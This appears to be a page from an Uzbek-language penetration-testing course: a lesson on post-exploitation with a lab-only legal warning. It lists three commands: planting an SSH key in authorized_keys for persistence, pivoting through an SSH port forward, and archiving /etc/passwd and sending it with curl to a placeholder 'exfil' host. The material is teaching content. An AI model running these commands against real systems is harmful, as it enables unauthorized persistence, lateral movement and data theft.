Modulga qaytish0%
O'quv darsi / Exploitation va Post-Exploitation
Post-exploitation
Persistence, lateral movement, data exfiltration.
25 daq.ilg'or3 komanda4/4
Maqsadlar
- SSH key qoldirish
- Pivoting
- Stealth
Faqat ruxsat etilgan muhitda mashq qiling
Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.
Komandalar
Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.
$
echo 'ssh-ed25519 AAAA...' >> ~/.ssh/authorized_keys$
ssh -L 8080:internal:80 user@pivot$
tar czf - /etc/passwd | base64 | curl -X POST --data-binary @- http://exfil/log